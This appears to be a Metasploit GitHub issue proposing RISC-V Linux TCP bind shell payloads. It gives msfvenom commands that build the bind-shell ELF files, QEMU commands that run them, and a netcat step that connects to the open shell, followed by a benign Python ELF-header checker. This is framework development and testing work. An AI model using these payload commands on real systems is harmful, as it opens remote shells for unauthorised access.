
Add Linux RISC-V 32-bit/64-bit TCP bind shell payloads

Open bcoles opened this issue 1 month ago • 0 comments

Add Linux RISC-V 32-bit/64-bit TCP bind shell payloads.

Source

  • https://modexp.wordpress.com/2022/05/02/shellcode-risc-v-linux/
  • https://web.archive.org/web/20230326161514/https://github.com/odzhan/shellcode/commit/d3ee25a6ebcdd21a21d0e6eccc979e45c24a9a1d
  • https://github.com/bcoles/shellcode/blob/main/riscv32/bindshell/bind.s

Verification

Tested with QEMU. For other test environments, see https://github.com/rapid7/metasploit-framework/pull/19518#issuecomment-2385330975.

Generate a Linux Command Shell, Bind TCP Inline payload (with optional NOP sled):

./msfvenom -n 100 -f elf -p linux/riscv64le/shell_bind_tcp LPORT=1337 > bind.elf
./msfvenom -n 100 -f elf -p linux/riscv32le/shell_bind_tcp LPORT=1337 > bind.elf

Execute the payload with QEMU:

$ /home/user/qemu/build/qemu-riscv64 -strace ./bind.elf
$ /home/user/qemu/build/qemu-riscv32 -strace ./bind.elf

Note the payload was executed successfully (lsof -i :1337) :)

Connect to the bindshell with netcat nc HOST 1337 (or use exploit/multi/handler).
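A quick sanity check on the generated bind.elf before copying it into the QEMU environment, as an added example that is not part of this PR: it parses the ELF header and confirms the file is a little-endian RISC-V executable of the expected bitness, which catches a wrong -p target before QEMU reports an exec format error. The constants come from the ELF specification; the build_header helper and its sample values are constructed for this example.

```python
import struct
import sys

# Constants from the ELF specification (not from the PR).
ELF_MAGIC = b"\x7fELF"
EM_RISCV = 243          # e_machine value assigned to RISC-V
ELFCLASS32, ELFCLASS64 = 1, 2
ELFDATA2LSB = 1         # little-endian, as the riscv32le/riscv64le names imply


def describe_elf(data: bytes) -> dict:
    """Parse the ELF identification block and the header fields needed to
    confirm an msfvenom -f elf artifact targets little-endian RISC-V.
    Returns class (bits), machine, type and entry point."""
    if len(data) < 52 or data[:4] != ELF_MAGIC:
        raise ValueError("not an ELF file")
    ei_class, ei_data = data[4], data[5]
    if ei_data != ELFDATA2LSB:
        raise ValueError("big-endian ELF; riscv*le payloads are little-endian")
    # e_type, e_machine and e_version follow the 16-byte e_ident block.
    e_type, e_machine, _ = struct.unpack_from("<HHI", data, 16)
    if ei_class == ELFCLASS64:
        (e_entry,) = struct.unpack_from("<Q", data, 24)
        bits = 64
    elif ei_class == ELFCLASS32:
        (e_entry,) = struct.unpack_from("<I", data, 24)
        bits = 32
    else:
        raise ValueError("unknown ELF class")
    return {"bits": bits, "machine": e_machine, "riscv": e_machine == EM_RISCV,
            "type": e_type, "entry": e_entry}


def build_header(bits: int, machine: int, entry: int) -> bytes:
    """Construct a minimal ET_EXEC ELF header (sample input, constructed here)."""
    e_ident = ELF_MAGIC + bytes([ELFCLASS64 if bits == 64 else ELFCLASS32,
                                 ELFDATA2LSB, 1]) + b"\x00" * 9
    body = struct.pack("<HHI", 2, machine, 1)
    body += struct.pack("<Q", entry) if bits == 64 else struct.pack("<I", entry)
    return (e_ident + body).ljust(64 if bits == 64 else 52, b"\x00")


if __name__ == "__main__":
    # With a path argument, inspect a real file (e.g. bind.elf); otherwise
    # fall back to a constructed RISC-V 64-bit header.
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else \
        build_header(64, EM_RISCV, 0x10078)
    print(describe_elf(blob))
```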

bcoles, Nov 27 '25 09:11